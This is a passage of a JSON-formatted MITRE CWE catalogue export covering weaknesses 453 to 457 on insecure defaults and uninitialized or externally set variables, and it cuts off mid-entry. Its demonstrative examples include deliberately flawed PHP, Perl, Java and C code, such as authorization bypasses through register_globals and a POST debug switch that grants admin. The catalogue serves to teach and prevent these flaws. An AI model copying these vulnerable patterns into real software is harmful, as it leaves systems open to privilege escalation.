Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Observed_Examples"}],"Previous_Entry_Name":{"#text":"UI Misrepresentation of Critical Information","attr":{"@_Date":"2014-02-18"}}}},"453":{"attr":{"@_ID":"453","@_Name":"Insecure Default Variable Initialization","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software, by default, initializes an internal variable with an insecure or less secure value than is possible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1188","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could gain access to and modify sensitive data or system information."}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Disable or change default settings when they can be used to abuse the system. Since those default settings are shipped with the product they are likely to be known by a potential attacker who is familiar with the product. For instance, default credentials should be changed or the associated accounts should be disabled."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to login a user using credentials from a POST request:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"if (login_user($user,$pass)) {}if ($authorized) {}","xhtml:br":["","","","",""],"xhtml:i":["// $user and $pass automatically set from POST request","..."],"xhtml:div":[{"#text":"$authorized = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"generatePage();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$user = $_POST[\'user\'];$pass = $_POST[\'pass\'];$authorized = false;if (login_user($user,$pass)) {}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"$authorized = true;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"..."}}],"Body_Text":["Because the $authorized variable is never initialized, PHP will automatically set $authorized to any value included in the POST request if register_globals is enabled. An attacker can send a POST request with an unexpected third value \'authorized\' set to \'true\' and gain authorized status without supplying valid credentials.","Here is a fixed version:","This code avoids the issue by initializing the $authorized variable to false and explicitly retrieving the login credentials from the $_POST variable. Regardless, register_globals should never be enabled and is disabled by default in current versions of PHP."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure default variable initialization"}},"Notes":{"Note":{"#text":"This overlaps other categories, probably should be split into separate items.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"454":{"attr":{"@_ID":"454","@_Name":"External Initialization of Trusted Variables or Data Stores","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.","Extended_Description":"A software system should be reluctant to trust variables that have been initialized outside of its trust boundary, especially if they are initialized by users. The variables may have been initialized incorrectly. If an attacker can initialize the variable, then they can influence what the vulnerable system will do.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"456","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could gain access to and modify sensitive data or system information."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking (e.g. input validation) is performed when relying on input from outside a trust boundary."},{"Phase":"Architecture and Design","Description":"Avoid any external control of variables. If necessary, restrict the variables that can be modified using an allowlist, and use a different namespace or naming convention if possible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the Java example below, a system property controls the debug level of the application.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"int debugLevel = Integer.getInteger(\\"com.domain.application.debugLevel\\").intValue();"},"Body_Text":"If an attacker is able to modify the system property, then it may be possible to coax the application into divulging sensitive information by virtue of the fact that additional debug information is printed/exposed as the debug level increases."},{"Intro_Text":"This code checks the HTTP POST request for a debug switch, and enables a debug mode if the switch is set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$debugEnabled = false;if ($_POST[\\"debug\\"] == \\"true\\"){}function login($username, $password){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"$debugEnabled = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"if($debugEnabled){}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"echo \'Debug Activated\';phpinfo();$isAdmin = True;return True;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}],"xhtml:i":"/.../"}},"Body_Text":["Any user can activate the debug mode, gaining administrator privileges. An attacker may also use the information printed by the phpinfo() function to further exploit the system. .","This example also exhibits Information Exposure Through Debug Information (CWE-215)"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0959","Description":"Does not clear dangerous environment variables, enabling symlink attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0959"},{"Reference":"CVE-2001-0033","Description":"Specify alternate configuration directory in environment variable, enabling untrusted path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0033"},{"Reference":"CVE-2001-0872","Description":"Dangerous environment variable not cleansed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0872"},{"Reference":"CVE-2001-0084","Description":"Specify arbitrary modules using environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0084"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"External initialization of trusted variables or values"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Notes":{"Note":[{"#text":"Overlaps Missing variable initialization, especially in PHP.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This is often found in PHP due to register_globals and the common practice of storing library/include files under the web document root so that they are available using a direct request."}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"External Initialization of Trusted Variables or Values","attr":{"@_Date":"2008-04-11"}},{"#text":"External Initialization of Trusted Variables","attr":{"@_Date":"2010-02-16"}}]}},"455":{"attr":{"@_ID":"455","@_Name":"Non-exit on Failed Initialization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not exit or otherwise modify its operation when security-relevant errors occur during initialization, such as when a configuration file has a format error, which can cause the software to execute in a less secure fashion than intended by the administrator.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"636","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Alter Execution Logic"],"Note":"The application could be placed in an insecure state that may allow an attacker to modify sensitive data or allow unintended logic to be executed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Follow the principle of failing securely when an error occurs. The system should enter a state where it is not vulnerable and will not display sensitive error messages to a potential attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1345","Description":"Product does not trigger a fatal error if missing or invalid ACLs are in a configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1345"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Non-exit on Failed Initialization"}},"Notes":{"Note":{"#text":"Under-studied. These issues are not frequently reported, and it is difficult to find published examples.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"456":{"attr":{"@_ID":"456","@_Name":"Missing Initialization of a Variable","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not initialize critical variables, which causes the execution environment to use unexpected values.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"909","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"89","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"457","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Quality Degradation","Varies by Context"],"Note":"The uninitialized data may be invalid, causing logic errors within the program. In some cases, this could result in a security problem."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Check that critical variables are initialized."},{"Phase":"Testing","Description":"Use a static analysis tool to spot non-initialized variables."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This function attempts to extract a pair of numbers from a user-supplied string.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void parse_data(char *untrusted_input){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int m, n, error;error = sscanf(untrusted_input, \\"%d:%d\\", &m, &n);if ( EOF == error ){}","xhtml:br":["","","",""],"xhtml:div":{"#text":"die(\\"Did not specify integer value. Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* proceed assuming n and m are initialized correctly */"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"123:"}],"Body_Text":["This code attempts to extract two integer values out of a formatted, user-supplied input. However, if an attacker were to provide an input of the form:","then only the m variable will be initialized. Subsequent use of n may result in the use of an uninitialized variable (CWE-457)."]},{"Intro_Text":"Here, an uninitialized field in a Java class is used in a seldom-called method, which would cause a NullPointerException to be thrown.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private User user;public void someMethod() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...String username = user.getName();","xhtml:br":["","","","",""],"xhtml:i":["// Do something interesting.","// Throws NPE if user hasn\'t been properly initialized."]}}}}},{"Intro_Text":"This code first authenticates a user, then allows a delete command if the user is an administrator.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"if (authenticate($username,$password) && setAdmin($username)){}if ($isAdmin){}","xhtml:div":[{"#text":"$isAdmin = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"deleteUser($userToDelete);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""],"xhtml:i":"/.../"}},"Body_Text":"The $isAdmin variable is set to true if the user is an admin, but is uninitialized otherwise. If PHP\'s register_globals feature is enabled, an attacker can set uninitialized variables like $isAdmin to arbitrary values, in this case gaining administrator privileges by setting $isAdmin to true."},{"Intro_Text":"In the following Java code the BankManager class uses the user variable of the class User to allow authorized users to perform bank manager tasks. The user variable is initialized within the method setUser that retrieves the User from the User database. The user is then authenticated as unauthorized user through the method authenticateUser.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankManager {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private User user = null;private boolean isUserAuthentic = false;public BankManager() {}public User getUserFromUserDatabase(String username){}public void setUser(String username) {}public boolean authenticateUser(String username, String password) {}...","xhtml:br":["","","","","","","","","","","","","","","","","",""],"xhtml:i":["// user allowed to perform bank manager tasks","// constructor for BankManager class","// retrieve user from database of users","// set user variable using username","// authenticate user","// methods for performing bank manager tasks"],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"this.user = getUserFromUserDatabase(username);","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (username.equals(user.getUsername()) && password.equals(user.getPassword())) {}return isUserAuthentic;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isUserAuthentic = true;","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankManager {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private User user = null;private boolean isUserAuthentic = false;public BankManager(String username) {}public User getUserFromUserDatabase(String username) {...}public boolean authenticateUser(String username, String password) {}","xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["// user allowed to perform bank manager tasks","// constructor for BankManager class","// retrieve user from database of users","// authenticate user"],"xhtml:div":[{"#text":"user = getUserFromUserDatabase(username);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (user == null) {}else {}return isUserAuthentic;","xhtml:div":[{"#text":"System.out.println(\\"Cannot find user \\" + username);","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (password.equals(user.getPassword())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isUserAuthentic = true;","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// methods for performing bank manager tasks"}}]}}}}],"Body_Text":"However, if the method setUser is not called before authenticateUser then the user variable will not have been initialized and will result in a NullPointerException. The code should verify that the user variable has been initialized before it is used, as in the following code."},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t unknown condition when i is the same value as err_val,\\n\\t\\t\\t because test_string is not initialized\\n\\t\\t\\t (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t (e.g. within a function body), test_string might be\\n\\t\\t\\t random if it is stored on the heap or stack. If the\\n\\t\\t\\t variable is declared in static memory, it might be zero\\n\\t\\t\\t or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n test_string might be an unexpected address, so the\\n printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t making sure that test_string has been properly set once\\n\\t\\t\\t it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t branch of the conditional - including the default/else\\n\\t\\t\\t branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-6078","Description":"Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078"},{"Reference":"CVE-2009-2692","Description":"Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2020-20739","Description":"A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20739"},{"Reference":"CVE-2005-2978","Description":"Product uses uninitialized variables for size and index, leading to resultant buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2978"},{"Reference":"CVE-2005-2109","Description":"Internal variable in PHP application is not initialized, allowing external modification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2109"},{"Reference":"CVE-2005-2193","Description":"Array variable not initialized in PHP application, leading to resultant SQL injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2193"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Initialization"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR30-C","Entry_Name":"Set errno to zero before calling a library function known to set errno, and check errno only after the function returns a value indicating failure","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL04-PL","Entry_Name":"Always initialize local variables","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL33-PL","Entry_Name":"Declare identifiers before using them","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-456"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-456"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Variable Initialization", Page 312"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-456"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-456"}}]},"Notes":{"Note":[{"#text":"This weakness is a major factor in a number of resultant weaknesses, especially in web applications that allow global variable initialization (such as PHP) with libraries that can be directly requested.","attr":{"@_Type":"Relationship"}},{"#text":"It is highly likely that a large number of resultant weaknesses have missing initialization as a primary factor, but researcher reports generally do not provide this level of detail.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Missing Initialization","attr":{"@_Date":"2013-02-21"}}}},"457":{"attr":{"@_ID":"457","@_Name":"Use of Uninitialized Variable","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses a variable that has not been initialized, leading to unpredictable or unintended results.","Extended_Description":"In some languages such as C and C++, stack variables are not initialized by default. They generally contain junk data with the contents of stack memory before the function was invoked. An attacker can sometimes control or read these contents. In other languages or conditions, a variable that is not explicitly initialized can be given a default value that has security implications, depending on the logic of the program. The presence of an uninitialized variable can sometimes indicate a typographic error in the 